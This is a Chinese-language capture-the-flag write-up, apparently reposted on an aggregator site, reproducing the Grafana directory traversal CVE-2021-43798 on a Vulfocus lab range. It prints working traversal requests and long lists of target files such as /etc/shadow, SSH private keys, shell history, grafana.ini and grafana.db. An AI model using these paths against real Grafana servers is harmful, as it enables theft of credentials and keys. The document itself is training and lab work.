grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程

这篇具有很好参考价值的文章主要介绍了grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞名称: grafana 目录遍历 (CVE-2021-43798)

漏洞描述: Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。

漏洞复现
打开靶场,启动漏洞环境:
cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全

访问漏洞环境:
cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全
admin/admin登录
cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全

从burpsuite中选择一个登录后的GET包,右键选择sent to repeater
在repeater进行修改

将GET后面的数据进行修改 ,改为
/public/plugins/welcome/…/…/…/…/…/…/…/…/…/etc/passwd

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline

grafana该版本存在漏洞的插件有40多个,具体可自行查找,此处以testdata为例。
cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全我问了很多人,这题没有flag,基本上做到这一步就没办法深入了,我自己也查了很多资料,包括etc/passwd的各种利用等等,在这个靶场都不是很适用,所以这题没有flag?实在是找不到flag在哪,一脸懵,又不把flag放在这些可读文件里,那岂不是又要getshell,到tmp里面去拿shell?可我真的想不到grafana这个要怎么getshell了,只知道各种用户名,但是密码不知道,前台账号密码是admin/admin,进去后台也是一无所有,空空如也,flag找了半天也找不到在哪,去了vulfocus的靶场看了marsk作者的write up,也是到这一步就结束了,也没说flag在哪,那既然没有flag,这题又是怎么通关呢?

知道flag的这两个人又是谁呢?哈哈,欢迎知道的小伙伴告诉我,这题的falg到底要怎么拿,或者说知道了etc/passwd之后,又要怎么样才能知道getshell?Grafana进了后台怎么getshell?必有重谢。
cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全

1-更新时间2022年6月24日

终于,在今天找到了拿flag的方法,之前问了无数人,都说考点就是目录遍历,和flag无关,我一直持否定态度,终于终于,在我苦苦查找资料的时候发现,漏掉了一个致命细节,那就是历史命令
回顾一下之前,到这一步之后能读到etc/passwd,如下图:
cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全
重点就在这最后一个grafana用户:
cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全直接查看这个用户的历史命令,就能看到flag,但是后面不知道为啥看不到了,真是奇怪。
cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全

2-更新时间2022年12月8日

今天又有小伙伴分享了其他的方法,虽然也是没有拿到flag,但是根据其他的ctf题目来看,这也是一种拿flag的办法,所以也记录一下。

还是和之前一样,启动vulfocus靶场。

抓包后直接读取到etc/passwd,然而并没有什么用。

/public/plugins/welcome/…/…/…/…/…/…/…/…/…/etc/passwd

cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全
原因是因为其实grafana有一些配置文件的路径我们不清楚,所以我们不知道下一步该干嘛了,因此,这里我列举一下。

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/grafana/provisioning
/etc/init.d/grafana-server
/etc/passwd
/etc/shadow
/etc/default/grafana-server
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/var/lib/grafana/data/log/grafana.log
/var/lib/grafana
/var/lib/grafana/plugins
/var/log/grafana
/var/log/grafana/grafana.log
/var/cache/yum/grafana
/usr/share/grafana  
/usr/share/grafana/conf/defaults.ini
/usr/share/grafana/public/app/plugins/datasource/grafana
/usr/sbin/grafana-server
/proc/net/fib_trie
/proc/net/tcp
/proc/self/maps
/proc/self/cgroup
/proc/self/environ
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie
/proc/self/cmdline
/public/plugins/alertGroups/../../../../../../../../etc/passwd
/tmp/grafana.sock

补充:那么多的grafana的配置路径,其实最主要比较重点关注的是这三个->
全局配置文件:

/etc/grafana/grafana.ini

默认配置文件:

/usr/local/etc/grafana/grafana.ini

grafana数据库db文件:

/var/lib/grafana/grafana.db

话不多说,读取一下配置文件试试:

/public/plugins/welcome/../../../../../../etc/grafana/grafana.ini

cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全
cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全

从这个文件里,读到了前台的密码为admin,而且发现了是有数据库的。所以按照思路来看,只需要登录admin/admin进入后台,找到数据库的接口进行数据查询就可以找到flag了🌟。但是经过实践发现,并没有这么简单。

cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全
设置mysql数据库,数据库是grafana,用户名是root,这个都没有错,然后密码为空。
点击测试,发现报错。

cve-2021-43798,vulfocus靶场通关,安全,web安全,渗透测试,漏洞复现,网络安全
说明没有启动数据库服务,所以这条路也不行了。但是假如以后实战里碰到,也可以通过这个配置文件来看后台的密码和数据库的信息,然后在后台的Explore功能界面里面做数据库的配置,就可以进行数据库的操作了。
所以今天为止,vulfocus的这道题,还是没有拿flag的方法的。目前找遍全网,包括CTF的题目来看,拿flag的方法只有这两种,一,历史命令。二、配置文件读取数据库信息,后台数据库查到flag。但是都不适用于vulfocus。

还知道其他方法的大佬欢迎私信。

    文章原创,欢迎转载,请注明文章出处: grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】–拿flag的历程.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。文章来源地址https://www.toymoban.com/news/detail-609103.html

到了这里,关于grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CVE-2021-22205 GitLab 远程命令执行漏洞复现

    目录 一、漏洞信息 二、环境搭建 三、复现过程 1.测试漏洞 2.漏洞利用,反弹shell 四、修复建议 一、漏洞信息 漏洞名称 GITLAB 远程命令执行漏洞 漏洞编号 CVE-2021-22205 危害等级 高危 CVSS评分 6.5 漏洞厂商 Ruby 受影响版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    浏览(41)
  • Spring Boot存在路径遍历漏洞CVE-2021-22118

    背景:Spring Boot存在路径遍历漏洞。CVE-2021-22118: 官方 issue也有对此的记录,感兴趣可以看下 https://github.com/spring-projects/spring-boot/issues/26627 https://github.com/spring-projects/spring-boot/issues/27543 CVE-2021-22118 是一个在 Spring Boot 中发现的漏洞。该漏洞关系到 Spring Boot 的开发者工具(Devtoo

    2024年02月11日
    浏览(43)
  • HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)

    2023年将会持续于B站、CSDN等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。 GET访问/x.asp

    2024年02月12日
    浏览(41)
  • Django系列所有漏洞复现vulhubCVE-2018-14574,CVE-2022-34265,CVE-2021-35042

    Django默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中。(由配置项中的django.middleware.common.CommonMiddleware、APPEND_SLASH来决定)。 在path开头为//example.com的情况下,Django没做处理,导致浏览器认为目的地址是绝对路径,最

    2024年02月07日
    浏览(40)
  • Apache Http Server 路径穿越漏洞复现(CVE-2021-41773)

    Apache HTTP Server(简称 Apache)是 Apache 软件基金会的一个开放源码的网页服务器软件,可以在大多数电脑操作系统中运行。由于其跨平台和安全性,被广泛使用,是最流行的 Web 服务器软件之一。它快速、可靠并且可通过简单的 API 扩展,将 Perl/Python 等解释器编译到服务器中。

    2024年02月08日
    浏览(75)
  • CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

    Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。该RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序。此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的

    2024年02月06日
    浏览(43)
  • WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)

    Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。 这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的

    2024年02月06日
    浏览(94)
  • Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)

    spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)

    2024年02月08日
    浏览(37)
  • 【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013)

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 CVE-2021-42013 漏洞名称 Apache HTTP_2.4.50_路径穿越漏洞 漏洞评级 高危 影响范围 2.4.49 2.4.50 漏洞描述 CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞,攻击者可以使用路径遍历攻击将

    2024年02月05日
    浏览(34)
  • Log4j2 - JNDI 注入漏洞复现(CVE-2021-44228)

    Apache log4j 是 Apache 的一个开源项目, Apache log4j2 是一个 Java 的日志记录工具。该工具重写了 log4j 框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 l

    2024年02月07日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包